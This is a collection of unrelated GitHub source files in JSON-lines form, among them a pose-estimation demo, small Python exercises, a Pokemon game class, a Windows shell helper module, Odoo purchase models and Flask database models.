enumerate(sorted(os.listdir(tmp_folder.name))): # sort so frames are processed in order\n pred_instances = process_one_image(\n args,\n f'{tmp_folder.name}/{img_fname}',\n model,\n visualizer,\n show_interval=1)\n progressbar.update()\n pred_instances_list.append(\n dict(\n frame_id=frame_id,\n instances=split_instances(pred_instances)))\n\n if output_root:\n mmcv.frames2video(\n tmp_folder.name,\n f'{output_root}/{os.path.basename(args.input)}',\n fps=video.fps,\n fourcc='mp4v',\n show_progress=False)\n tmp_folder.cleanup()\n\n else:\n args.save_predictions = False\n raise ValueError(\n f'file {os.path.basename(args.input)} has invalid format.')\n\n if args.save_predictions:\n with open(args.pred_save_path, 'w') as f:\n json.dump(\n dict(\n meta_info=model.dataset_meta,\n instance_info=pred_instances_list),\n f,\n indent='\\t')\n print(f'predictions have been saved at {args.pred_save_path}')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ShirleyMaxx/ChimpACT","sub_path":"mmpose/demo/bottomup_demo.py","file_name":"bottomup_demo.py","file_ext":"py","file_size_in_byte":5571,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"39"} +{"seq_id":"28471552796","text":"import csv\r\n\r\nACCEPTED_MSG = \"\"\"\r\nHi {},\r\n\r\nWe are thrilled to let you know that you are accepted to our programming workshop.\r\n\r\nYour coach is {}.\r\n\r\nThank you,\r\nOrganizers\r\n\"\"\"\r\n\r\nREJECTED_MSG = \"\"\"\r\nHi {},\r\n\r\nWe are very sorry to let you know that due to a big number of applications\r\nwe couldn't fit you at the workshop this time.\r\n\r\nThank you,\r\nOrganizers\r\n\"\"\"\r\n\r\n# csv_file = open('python_test_spreadsheet.csv')\r\nwith open('python_test_spreadsheet.csv') as csv_file:\r\n csv_reader = csv.reader(csv_file, delimiter=',')\r\n next(csv_reader) # to skip the first row since it just contains the heading of each column\r\n\r\n for row in csv_reader:\r\n name, email, accepted, coach, language = row\r\n # print(name, email, accepted, coach, language)\r\n\r\n if accepted == \"yes\":\r\n msg = ACCEPTED_MSG.format(name, coach)\r\n else:\r\n msg = REJECTED_MSG.format(name)\r\n print(\"Send email to: {}\".format(email))\r\n print(\"Email content:\")\r\n print(msg)\r\n\r\n# csv_file.close() # not required for \"with open('filename')\"\r\n","repo_name":"sidmen/python","sub_path":"basics_and_misc/spreadsheet.py","file_name":"spreadsheet.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"15556607154","text":"import json\n\nimport requests\n\nURL = \"http://127.0.0.1:8000/per_create/\"\n\ndata = {\n 'name': 'Mary',\n 'surname': 'Johnson',\n 'city':'Greenwood',\n 'state':'Indiana',\n 'country':'USA'\n\n}\njson_data = json.dumps(data)\nr = requests.post(url = URL, data = json_data)\ndata = r.json() # json() is a method; without the parentheses this printed the bound method\nprint(data)\n","repo_name":"Anushka11mindbowser/django-practice","sub_path":"myapp.py","file_name":"myapp.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"74349719792","text":"'''\nWe will have two classes to import\n\nObviously, there is the Pokemon class...\n\nBut we also need a Candy class for the candy amounts\nSince each pokemon uses its lowest evolution for the candy\n\nTherefore, multiple pokemon of different higher evolutions will all use the same candy\n'''\nclass Candy:\n # Initialize the family, and then the count to 0\n def __init__(self, family, count=0):\n 
self.family = family\n self.count = count\n \n # Add candy method\n def add(self, amount):\n self.count += amount\n \n # We will use a classmethod that acts on the whole class instead of only the 'self' object, since multiple objects will be under this one class\n @classmethod\n # And so to create the candy for the family\n def create_for_family(cls, family): # Class method used to intialize candy object for certain family\n # We will return the class with family and count\n return cls(family, count=0)\n\nclass Pokemon:\n \n # Before the __init__ we need to find other information about a given pokemon\n def find_in_names(self, pokemon_names):\n x = 0\n for i in pokemon_names:\n y = 0\n for j in i:\n if self.get_name() == j:\n break\n y += 1\n if self.get_name() == j:\n break\n x += 1\n return [x,y]\n\n # Initialize all our variables\n def __init__(self, name, typ, cp, family, randomstats, isShiny, pokemon_names):\n self.name = name\n self.type = typ\n self.cp = cp\n self.stats = randomstats\n # Calculate IV given random initial stats\n self.iv = round((sum(randomstats)/45)*100, 1)\n self.shiny = isShiny\n self.family = family\n self.candy = Candy(family)\n self.candy_powerup = 2\n self.stardust_powerup = 1900\n # Unpack family and evolution from the method above\n x,y = self.find_in_names(pokemon_names)\n self.candy_evolve = 25 * (y+1)\n self.power_up_level = 0\n self.number_of_battles_won = 0\n\n # Accessor methods\n\n def get_name(self):\n return self.name\n \n def get_type(self):\n return self.type\n\n def get_cp(self):\n return self.cp\n\n def get_stats(self):\n return self.stats\n\n def get_iv(self):\n return self.iv\n\n def get_shiny(self):\n return self.shiny\n\n def get_candy_powerup(self):\n return self.candy_powerup\n\n def get_stardust_powerup(self):\n return self.stardust_powerup\n\n def get_candy_evolve(self):\n return self.candy_evolve\n \n def get_number_of_battles_won(self):\n return self.number_of_battles_won\n\n def get_shiny_text(self):\n x = self.get_shiny()\n if x == True:\n return \"\\033[1;33mYES!\\033[0m\"\n else:\n return \"No\"\n \n # Method to check if there does exist a higher evolution of the pokemon\n def canEvolve(self, pokemon_names):\n x,y = self.find_in_names(pokemon_names)\n if y+1 < len(pokemon_names[x]):\n return True\n else:\n return False\n \n # Stat and cost display method\n def display_attributes(self, inventory, pokemon_names, fight=False):\n print(f\"\\nName: {self.get_name()}\")\n print(f\"Type: {self.get_type()}\")\n print(f\"Combat Power: {self.get_cp()}\")\n x = self.get_stats(); print(f\"Stats: {x[0]} Attack, {x[1]} Defense, {x[2]} Stamina\")\n print(f\"IV: {self.get_iv()}%\")\n print(f\"Number of battles won: {self.get_number_of_battles_won()}\")\n # Print shiny state with ANSI colouring\n x = self.get_shiny()\n if x == True:\n print(f\"Shiny?: \\033[1;33mYES!\\033[0m\")\n else:\n print(\"Shiny?: No\")\n\n # Then print costs if this method is not called for a hostile pokemon\n if fight == False:\n print(f\"\\nCosts:\")\n\n # With green and red to check if the player can do it\n green = '\\033[32m'\n red = '\\033[31m'\n\n def powerup_msg(colour):\n print(f\"{colour}You need {self.get_candy_powerup()} {self.family} candies and {self.get_stardust_powerup()} stardust to power up this pokemon.\\033[0m\")\n def evolve_msg(colour):\n print(f\"{colour}You need {self.get_candy_evolve()} {self.family} candies to evolve this pokemon.\\033[0m\")\n\n if inventory[2] >= self.get_stardust_powerup() and inventory[1][self.family].count >= 
self.get_candy_powerup():\n powerup_msg(green)\n else:\n powerup_msg(red)\n \n if self.canEvolve(pokemon_names):\n if inventory[1][self.family].count >= self.get_candy_evolve():\n evolve_msg(green)\n else:\n evolve_msg(red)\n \n # Power up method\n\n # Essentially checks if player has enough, and powers pokemon up, removing the costs from the inventory\n\n def power_up(self, inventory, cp_increase, stats_chance, possible_increment):\n if inventory[2] >= self.get_stardust_powerup() and inventory[1][self.family].count >= self.get_candy_powerup():\n # Note: only powers up 10 times\n if self.power_up_level < 10:\n self.power_up_level += 1\n inventory[2] -= self.stardust_powerup\n old = self.cp\n self.cp += int(round(cp_increase*(1-(self.power_up_level/10))))\n print(f\"\\n{self.get_name()}'s CP increased by {self.cp - old}!\")\n # Costs increase\n # Stardust increases 300 each time\n self.stardust_powerup += 300\n # And candy increasing 1 every 3 powerups\n if self.power_up_level % 3 == 0:\n self.candy_powerup += 1\n # Also a 50% chance to increase stats on a power up\n if stats_chance < 50:\n self.stats = possible_increment\n print(f\"{self.get_name()}'s stats have also evolved!\")\n self.iv = round((sum(self.get_stats())/45)*100, 1)\n else:\n print(\"\\nThis pokemon has been powered up a maximum of 10 times.\")\n else:\n print(f\"\\nYou either do not have enough stardust or {self.family} candies to power up this pokemon!\")\n\n # Evolve method\n # Essentially checks if it can evolve, and subtracts costs\n # Where it then takes increments and adds it to stats\n # Then prints out results\n def evolve(self, inventory, pokemon_names, pokemon_types, cp_increase, stats_increment):\n if self.canEvolve(pokemon_names):\n if inventory[1][self.family].count >= self.get_candy_evolve():\n inventory[1][self.family].count -= self.get_candy_evolve()\n self.candy_evolve = self.candy_evolve * 2\n x, y = self.find_in_names(pokemon_names)\n old_name = self.name\n old_type = self.type\n self.name = pokemon_names[x][y+1]\n self.type = pokemon_types[x][y+1]\n self.power_up_level = 0\n old_cp = self.cp\n self.cp += cp_increase\n self.stats = stats_increment\n self.iv = round((sum(self.get_stats())/45)*100, 1)\n print(f\"Your {old_name} ({old_type}) evolved into a {self.name} ({self.type})! 
\")\n print(f\"\\n{self.get_name()}'s CP increased by {self.cp-old_cp}!\")\n x = self.get_stats(); print(f\"It's new stats are: {x[0]} Attack, {x[1]} Defense, {x[2]} Stamina\")\n else:\n print(f\"\\nYou do not have enough {self.family} candies!\")\n else:\n print(\"\\nThis pokemon cannot evolve any further.\")\n\n # Catch method\n def catch(self, inventory, random):\n # Adds object to first list in inventory\n inventory[0].append(self)\n # And adds candy to candydict\n family = self.family\n if family not in inventory[1]: # If this is the first time this family is being caught\n inventory[1][family] = Candy.create_for_family(family)\n # And adds a random amount of candy\n inventory[1][family].add(random)","repo_name":"ahmedkhaleel2004/Py-kemon-Go","sub_path":"Pokemon_class.py","file_name":"Pokemon_class.py","file_ext":"py","file_size_in_byte":8283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"23156645324","text":"import argparse\nimport pandas as pd\nimport random\nfrom math import radians, degrees, sin, cos, asin, acos, sqrt\nimport numpy as np\ntry:\n from itertools import izip as zip\nexcept ImportError:\n pass\n\ndef great_circle(lon1, lat1, lon2, lat2):\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n return 6371 * (\n acos(sin(lat1) * sin(lat2) + cos(lat1) * cos(lat2) * cos(lon1 - lon2))\n )\n\n\ndef print_result(df):\n global index, row, average_dist, df_closest\n for index, row in df.iterrows():\n print(row['city1'], row['city2'], str(row['distance']) + \"Km\")\n average_dist = np.average(df['distance'])\n df_closest = df.iloc[\n (df['distance'] - average_dist).abs().argsort()[:1]]\n print(\"Average distance: {0}km. Closest pair: {1} - {2} {3}km\".format(average_dist, df_closest['city1'].tolist()[0],\n df_closest['city2'].tolist()[0],\n df_closest['distance'].tolist()[0]))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"Description for my parser\")\n parser.add_argument(\"-n\", \"--n\", help=\"Example: Help argument\", required=False, default=\"\")\n argument = parser.parse_args()\n data = pd.read_csv(\"coordinates.csv\", header=0)\n iterat = data.iterrows()\n result = pd.DataFrame(columns=[\"city1\", \"city2\", \"distance\"])\n result_no_argument = pd.DataFrame(columns=[\"city1\", \"city2\", \"distance\"])\n\n if argument.n != '':\n random_indices = random.sample(range(0,10), int(argument.n))\n for i in range(1, len(random_indices)):\n result.loc[i-1] = [data.iloc[i-1][0], data.iloc[i][0], great_circle(data.iloc[i-1][1], data.iloc[i-1][2], data.iloc[i][1], data.iloc[i][2])]\n sorted_df = result.sort_values('distance')\n print_result(sorted_df)\n else:\n lst = []\n for id1, id2 in zip(data.iterrows(), data.iloc[1:].iterrows()):\n lst.append([id1[1]['Name'], id2[1]['Name'],\n great_circle(id1[1]['Latitude'], id1[1]['Longitude'], id2[1]['Latitude'],\n id2[1]['Longitude'])])\n df = pd.DataFrame(lst, columns=[\"city1\", \"city2\", \"distance\"])\n result_no_argument = result_no_argument.append(df)\n sorted_result_no_argument = result_no_argument.sort_values('distance')\n sorted_result_no_argument = sorted_result_no_argument.drop_duplicates()\n print_result(sorted_result_no_argument)","repo_name":"raghupalakodetyFRA/AirmineTask","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"6977780296","text":"# 이코테 음료수 얼려 먹기\nimport 
sys\ninput = sys.stdin.readline\n\n# N: 얼음틀의 세로 길이\n# M: 얼음틀의 가로 길이\nN, M = map(int, input().split())\n\n# 전체 얼음틀 정보 \ngraph = []\nfor _ in range(N):\n graph.append(list(map(int, input().split())))\n \n \ndef dfs(x, y):\n if x < 0 or x >= N or y < 0 or y >= M:\n return False\n if graph[x][y] == 0: # 뚫려있는 부분\n graph[x][y] = 1 # 방문 여부 업데이트 \n dfs(x - 1, y)\n dfs(x + 1, y)\n dfs(x, y + 1)\n dfs(x, y - 1)\n return True\n return False\n\n\nresult = 0\nfor i in range(N):\n for j in range(M):\n if dfs(i, j):\n result += 1\n \n \nprint(result)\n","repo_name":"youngeun-dev/coding-test-practice","sub_path":"python/음료수-얼려-먹기.py","file_name":"음료수-얼려-먹기.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"70287241713","text":"#!/usr/bin/python\n\nimport sys\nimport math\n\ng = float(sys.argv[1])\nr = float(sys.argv[2])\n\n#v_escape = 0\n#r_metros = 0\n#if g == 9.8 and r == 6371: # Datos de la tierra\nr_metros = r*1000\nv_escape = math.sqrt(2*g*r_metros)\n\nprint (\"velocidad: {}\".format(v_escape))\n","repo_name":"jfgomezponce/Data-Science-DesafioLatam","sub_path":"1-Introduccion_a_la_Programacion/S1_M-11_J-13_Junio_2019_Introduccion_a_la_Programacion/Desafio_Semana_1_M-11/Desafio_Velocidad/escape.py","file_name":"escape.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"4991989923","text":"import numpy as np\nfrom scipy.stats import multivariate_normal\n\n\ndef gaussian_NLPD(y_real, y_pred, cov):\n nll = -np.mean(\n [multivariate_normal.logpdf(x=y_real[i], mean=y_pred[i], cov=cov[i]) for i in range(len(y_pred))])\n return nll\n\n\ndef Parzen_NLPD(yTrue, yPred, bw):\n n_instances = yTrue.shape[0]\n nlpd = np.zeros((n_instances))\n for i in range(n_instances):\n n_samples = yPred[i].shape[0]\n yt = np.tile(yTrue[i], n_samples)\n\n E = -0.5 * np.power((yt - yPred[i].flatten()) / bw, 2)\n\n max_exp = np.max(E, axis=-1, keepdims=True)\n\n max_exp_rep = np.tile(max_exp, n_samples)\n exp_ = np.exp(E - max_exp_rep)\n\n constant = 0.5 * np.log(2 * np.pi) + np.log(n_samples * bw)\n nlpd[i] = -np.log(np.sum(exp_)) - max_exp + constant\n return np.mean(nlpd)\n\n\ndef Parzen(regcgan, x, y, n_sampling=100, n_bands=100):\n n_instance = x.shape[0]\n ypred_list = []\n for i in range(n_instance):\n x_ = np.tile(x[i], (n_sampling, 1))\n ypred_ = regcgan.predict(x_)\n ypred_list.append(ypred_)\n return min_Parzen_NLPD(y, np.array(ypred_list), n_bands)\n\n\ndef min_Parzen_NLPD(yTrue, yPred, n_bands=100):\n windows = np.linspace(0.01, 5, n_bands)\n nlpd = []\n for bw in windows:\n nlpd.append(Parzen_NLPD(yTrue, yPred, bw))\n inx = np.argmin(np.asarray(nlpd))\n return nlpd[inx], windows[inx], nlpd\n\n\ndef Parzen_test(regcgan, X, y, bw, n_sampling=10):\n n_instance = X.shape[0]\n ypred_list = []\n for i in range(n_instance):\n x_ = np.tile(X[i], (n_sampling, 1))\n ypred_ = regcgan._make_predict(x_)\n ypred_list.append(ypred_)\n return Parzen_NLPD(y, np.array(ypred_list), bw)\n","repo_name":"zhongsheng-chen/RegCGAN","sub_path":"metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"39"} +{"seq_id":"9737601842","text":"#Code by Sergio1260\r\n\r\nfrom subprocess import check_output\r\nfrom sys import path\r\nfrom colors import color\r\n\r\n\r\ndef fixcrdir(fix):\r\n fix=fix.split(\"\\\\\")\r\n return 
fix[len(fix)-2]\r\n\r\ndef readable(num, suffix=\"B\"):\r\n for unit in [\"\", \"Ki\", \"Mi\", \"Gi\", \"Ti\"]:\r\n if abs(num) < 1024.0:\r\n return f\"{num:3.1f}{unit}{suffix}\"\r\n num /= 1024.0\r\n return f\"{num:.1f}Yi{suffix}\"\r\n\r\ndef mkadlnk(arg):\r\n with open(arg, 'rb') as file:\r\n bytes_data = bytearray(file.read())\r\n bytes_data[0x15] = bytes_data[0x15] | 0x20\r\n with open(arg, 'wb') as file:\r\n file.write(bytes_data)\r\n\r\ndef fixaddr(arg):\r\n from glob import glob\r\n from os.path import isfile\r\n fix=glob(arg, recursive=False)\r\n if not len(fix)==0 and not len(fix)>1:\r\n fix=fix[0]\r\n if not isfile(fix):\r\n try:\r\n ext=str(check_output('cd /D \"'+fix+'\" 2>nul && cd', shell=True), encoding=\"cp437\")\r\n ext=ext[:len(ext)-2]\r\n if not ext[len(ext)-1]==chr(92): ext+=chr(92)\r\n return ext\r\n except: print(color(\"\\n Permision Denied\\n\",\"R\")); return None\r\n else: print(color(\"\\n It isn't a valid directory\\n\",\"R\")); return None\r\n else:\r\n if len(fix)>1: print(color(\"\\n Too many arguments\\n\",\"R\")); return None\r\n else: print(color(\"\\n The dir doesn't exist\\n\",\"R\")); return None\r\n\r\ndef fixfiles(arg):\r\n arg=arg.split(chr(92))\r\n file=arg.pop(); buff=\"\"\r\n for x in arg: buff+=x+chr(92)\r\n arg=fixaddr(buff)\r\n if not arg==None:\r\n return arg+file\r\n else: return \"\"\r\n\r\ndef stdin():\r\n while True:\r\n try:\r\n ext=check_output('powershell read-host', shell=False)\r\n ext=str(ext); ext=ext[2:len(ext)-5]; return ext; break\r\n except: pass\r\n\r\ndef pwdstdin():\r\n file=path[0]+\"\\\\import\\\\powershell\\\\hiddenpwd.ps1\"\r\n fix=\"Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass -Force; \"\r\n ext=check_output(\"powershell \"+fix+file,shell=False)\r\n ext=str(ext); ext=ext[2:len(ext)-5]\r\n return ext\r\n\r\ndef adminname():\r\n ext=str(check_output(\"net localgroup\"))\r\n ext=ext[ext.find(\"-\\\\r\\\\n*\")+6:]\r\n ext=ext[:ext.find(\"\\\\r\\\\n\")]\r\n return ext.lower()\r\n\r\ndef createuserexec():\r\n from link import mklnk\r\n fic=open(path[0]+\"\\\\import\\\\fixcmd\\\\start.cmd\",\"w\")\r\n fic.write(\"@echo off\\ntitle OEPWS shell\\nshift\\nstart /B /WAIT \"+path[0]+\"\\\\Shell.py %*%\")\r\n dirt=path[0]+\"\\\\import\\\\fixcmd\"\r\n mklnk(dirt,\"admin\",dirt+\"\\\\start.cmd\",dirt)\r\n mkadlnk(dirt+\"\\\\admin.lnk\")\r\n\r\n\r\ndef lsusr():\r\n raw=str(check_output(\"net user\",shell=True), encoding=\"cp437\")\r\n raw=raw[raw.find(\"----\\r\")+6:]; fix=[]; raw=raw.split(\"\\r\\n\")\r\n raw.pop(); raw.pop(); raw.pop(); fix=[]\r\n for x in raw:\r\n x=x.split(\" \")\r\n for i in x:\r\n i=i.rstrip().lstrip()\r\n if not i==\"\": fix.append(i)\r\n return fix\r\n\r\ndef lsgrp():\r\n raw=str(check_output(\"net localgroup\",shell=True), encoding=\"cp437\")\r\n raw=raw[raw.find(\"----\\r\")+6:]; fix=[]; raw=raw.split(\"\\n\")\r\n raw.pop(); raw.pop(); raw.pop(); raw.pop(0)\r\n for x in raw: fix.append(x[1:].replace(\"\\n\",\"\"))\r\n return fix\r\n\r\ndef extusr(arg):\r\n for x in lsusr():\r\n if x==arg: return True\r\n return False\r\n\r\ndef extgrp(arg):\r\n for x in lsgrp():\r\n if x==arg:\r\n return True\r\n return False\r\n\r\ndef isadmin():\r\n try: open(\"C:\\\\tmp\",\"w\"); return True\r\n except: return False\r\n \r\n","repo_name":"Sergio00166/OEPWS","sub_path":"windows/other.py","file_name":"other.py","file_ext":"py","file_size_in_byte":3503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"15479119103","text":"with open('j9.txt', 'r') as 
f:\r\n s = f.readline()\r\n\r\nk = 0\r\n\r\nfor i in range(0, len(s)//2):\r\n if s[i] == s[len(s)-i-1]:\r\n k += 1\r\n\r\nprint(k)\r\n","repo_name":"SavinVladimir/EGE","sub_path":"Задание - 24/Перебор со сложным условием/02_solution.py","file_name":"02_solution.py","file_ext":"py","file_size_in_byte":155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"35445329279","text":"from datetime import datetime\nfrom flask import g, abort\nfrom werkzeug import secure_filename\nimport os\nimport urllib, hashlib\n\nclass Model:\n\n def tablename(self):\n return self.Meta.table\n\n def non_auto_fields(self):\n return [f for f in self.Meta.fields if f not in self.Meta.auto_fields]\n\n def __iter__(self):\n return (getattr(self, col) for col in self.non_auto_fields())\n\n def insert(self, cursor=None):\n if cursor is None:\n cursor = g.cursor\n query = 'INSERT INTO %s (%s) VALUES (%s)' % (\n self.tablename(),\n ','.join(self.non_auto_fields()),\n ','.join(['%s']*len(self.non_auto_fields())))\n\n cursor.execute(query, list(self))\n if self.Meta.pk in self.Meta.auto_fields:\n cursor.execute(\"SELECT LASTVAL() FROM %s\" % self.tablename())\n pk = cursor.fetchone()[0]\n setattr(self, self.Meta.pk, pk)\n\n def update(self, cursor=None):\n if cursor is None:\n cursor = g.cursor\n params = ', '.join([\"{}=%s\".format(field) for field in self.non_auto_fields()])\n cursor.execute(\n \"UPDATE %s SET %s WHERE %s=%%s\" % (self.tablename(), params, self.Meta.pk),\n list(self) + [self.pk]\n )\n\n @property\n def pk(self):\n return getattr(self, self.Meta.pk)\n\n\n @classmethod\n def from_dict(klass, d, is_top=True):\n our_fields = {\n k.split(\".\")[-1]:v for k,v in d.items()\n if k.startswith(klass.tablename(klass) + \".\") or '.' 
not in k and is_top\n }\n instance = klass(**our_fields)\n for submodel in klass.Meta.foreign_models:\n try:\n submodel_instance = submodel.from_dict(d, is_top=False)\n except Exception as e:\n submodel_instance = None\n print(e)\n setattr(instance, submodel.__name__.lower(), submodel_instance)\n\n return instance\n\n @classmethod\n def star(klass):\n return ','.join(['{0}.{1} AS \"{0}.{1}\"'.format(klass.Meta.table, col) for col in klass.Meta.fields])\n\n\n\nclass Label(Model):\n def __init__(self, id=None, name=None):\n self.id = int(id) if id is not None else None\n self.name = name\n\n\n class Meta:\n fields = ['id', 'name']\n auto_fields = ['id']\n pk = 'id'\n table = 'label'\n foreign_models = []\n\n\nclass User(Model):\n def __init__(self, id=None, username=None, email=None, password=None, created=None, is_admin=False):\n self.id = int(id) if id is not None else None\n self.username = username\n self.email = email\n self.password = password\n if created is None:\n created = datetime.now()\n self.created = created\n self.is_admin = is_admin\n\n def is_authenticated(self):\n return True\n\n def gravatar(self):\n gravatar_url = \"http://www.gravatar.com/avatar/\" + hashlib.md5(self.email.lower().encode('utf-8')).hexdigest() + \"?\"\n gravatar_url += urllib.parse.urlencode({'d':'wavatar', 's':str(100)})\n return gravatar_url\n\n class Meta:\n fields = ['id', \"username\", \"email\", \"password\", \"created\", \"is_admin\"]\n auto_fields = ['id']\n pk = 'id'\n table = 'users'\n foreign_models = []\n\n\nclass AnonymousUser:\n def is_authenticated(self):\n return False\n\n @property\n def is_admin(self):\n return False\n\n @property\n def id(self):\n return -1\n\n\n\nclass Etablissement(Model):\n def __init__(self, id=None, name=None, phone=None, url=None, address_street=None, address_number=None, address_city=None, address_zip=None, latitude=None, longitude=None, created=None, user_id=None, type=None, picture=None, *args, **kwargs):\n self.id = int(id) if id is not None else None\n self.name = name\n self.phone = phone\n self.url = url\n self.address_street = address_street\n self.address_number = address_number\n self.address_city = address_city\n self.address_zip = address_zip\n self.latitude = latitude\n self.longitude = longitude\n self.created = created\n self.user_id = user_id\n self.type = type\n self.picture = picture\n\n @classmethod\n def from_form(klass, form, user_id, type):\n instance = klass(\n name=form.name.data,\n phone=form.phone.data,\n url=form.url.data,\n address_street=form.address_street.data,\n address_number=form.address_number.data,\n address_city=form.address_city.data,\n address_zip=form.address_zip.data,\n latitude=form.latitude.data,\n longitude=form.longitude.data,\n created=datetime.now(),\n user_id=user_id,\n type=type,\n )\n return instance\n\n def to_marker(self):\n return {\n \"name\": self.name,\n \"lat\": float(self.latitude),\n \"lon\": float(self.longitude),\n }\n\n def set_picture(self, form_field, files):\n image = files[form_field.name]\n if image:\n image_data = image.read()\n secure = secure_filename(image.filename)\n open('static/media/' + secure, 'wb').write(image_data)\n self.picture = '/static/media/' + secure\n\n def get_picture(self):\n if self.picture:\n return self.picture\n\n if self.type == 'hotel':\n return \"/static/default-hotel.jpg\"\n\n if self.type == 'bar':\n return \"/static/default-bar.jpg\"\n\n if self.type == 'restaurant':\n return \"/static/default-restaurant.jpg\"\n\n def get_url(self):\n if self.type == 'hotel':\n return 
\"/hotels/\" + str(self.id)\n\n if self.type == 'bar':\n return \"/bars/\" + str(self.id)\n\n if self.type == 'restaurant':\n return \"/restaurants/\" + str(self.id)\n\n class Meta:\n fields = ['id', \"name\", \"phone\", \"url\", \"address_street\", \"address_number\", \"address_zip\", \"address_city\", \"latitude\", \"longitude\", \"created\", \"user_id\", \"type\", \"picture\"]\n auto_fields = ['id']\n pk = 'id'\n table = 'etablissement'\n foreign_models = [User]\n\nclass Hotel(Model):\n def __init__(self, etablissement_id=None, stars=None, rooms=None, price=None, *args, **kwargs):\n self.etablissement_id = etablissement_id\n self.stars = stars\n self.rooms = rooms\n self.price = price\n\n class Meta:\n fields = [\"etablissement_id\", \"stars\", \"rooms\", \"price\"]\n auto_fields = []\n pk = 'etablissement_id'\n table = 'hotel'\n foreign_models = [Etablissement]\n\n\nclass Bar(Model):\n def __init__(self, etablissement_id=None, smoker=None, food=None, *args, **kwargs):\n self.etablissement_id = etablissement_id\n self.smoker = smoker\n self.food = food\n\n class Meta:\n fields = [\"etablissement_id\",\"smoker\",\"food\",]\n auto_fields = []\n pk = 'etablissement_id'\n table = 'bar'\n foreign_models = [Etablissement]\n\n\nclass Restaurant(Model):\n def __init__(self, etablissement_id=None, price_range=None, max_seats=None, takeaway=False, delivery=None, openings=None, *args, **kwargs):\n self.etablissement_id = etablissement_id\n self.price_range = price_range\n self.max_seats = max_seats\n self.takeaway = takeaway\n self.delivery = delivery\n self.openings = openings\n\n class Meta:\n fields = [\"etablissement_id\", \"price_range\", \"max_seats\", \"takeaway\", \"delivery\", \"openings\"]\n auto_fields = []\n pk = 'etablissement_id'\n table = 'restaurant'\n foreign_models = [Etablissement]\n\n\nclass Comment(Model):\n def __init__(self, id=None, user_id=None, etablissement_id=None, date=None, score=None, text=None):\n self.id = int(id) if id is not None else None\n self.user_id = user_id\n self.etablissement_id = etablissement_id\n self.date = date\n self.score = score\n self.text = text\n\n class Meta:\n fields = [\"id\", \"user_id\", \"etablissement_id\", \"date\", \"score\", \"text\"]\n auto_fields = ['id']\n pk = \"id\"\n table = \"comment\"\n foreign_models = [Etablissement, User]\n\n\ndef get_or_404(query, params, model):\n g.cursor.execute(query, params)\n row = g.cursor.fetchone()\n if row is None:\n return abort(404)\n return model.from_dict(row)\n\n\ndef list_of(query, params, model):\n g.cursor.execute(query, params)\n rows = g.cursor.fetchall()\n def map_to_model(r):\n m = model.from_dict(r)\n m.extra = r\n return m\n return [map_to_model(r) for r in rows]\n","repo_name":"C4ptainCrunch/info-h-303","sub_path":"flask/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"32118345291","text":"from functions import randomChoose, startGame, createPlayer, showStats\n\nfrom playsound import playsound\n\nselect = True\n\n#display options menu\nwhile select:\n print(\"\"\"\n === Hangman Game ===\n A: New Game\n B: Quit Game\n C: Player Status\n D: Create New Player\n \"\"\")\n\n playsound('menu.wav')\n\n #ask for user's choice\n select = input(\"Choose an option: \")\n\n#################################################\n\n if select.lower() == \"a\":\n #start new game\n #randomly chooses a word from the list\n 
randomChoose()\n\n#################################################\n\n if select.lower() == \"b\":\n #end program\n print(\"Exiting program...\")\n playsound('exit.wav')\n exit()\n\n#################################################\n\n if select.lower() == \"c\":\n playsound('select.wav')\n #display player stats\n showStats()\n\n#################################################\n\n if select.lower() == \"d\":\n playsound('select.wav')\n #create new player\n createPlayer()","repo_name":"teldrynsero/AdvPy-Cmarcial2","sub_path":"hangman/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"6863253386","text":"from odoo import fields,api,models,_\n\n\nclass PurchaseOder(models.Model):\n _inherit = 'purchase.order'\n\n received_status = fields.Boolean()\n note = fields.Text()\n @api.multi\n def check_purchase_order_received(self):\n for rec in self:\n state = False\n for order_id in rec.order_line:\n if order_id.received_state :\n state = True\n print(state,\"======\")\n rec.write({'received_status': state})\n print(rec.received_status,fields.Datetime.now())\n\n\n def update_note_with_discription(self):\n for rec in self:\n for line in rec.order_line:\n rec.note += line.name\n\n\nclass PurchaseOderLine(models.Model):\n _inherit = 'purchase.order.line'\n\n received_state = fields.Boolean(compute='update_parent_po',store=True)\n\n @api.depends('qty_received')\n def update_parent_po(self):\n for line in self:\n if line.qty_received:\n if line.product_qty > line.qty_received:\n line.received_state = False\n else:\n line.received_state = True\n parent_order= self.env['purchase.order'].search([('id','=',line.order_id.id)])\n print(\"parent ID \",parent_order)\n parent_order.check_purchase_order_received()","repo_name":"emadraafatgad/karim","sub_path":"third_party/manufacturing_furnature_mrp/models/stock_picking_backorder.py","file_name":"stock_picking_backorder.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} 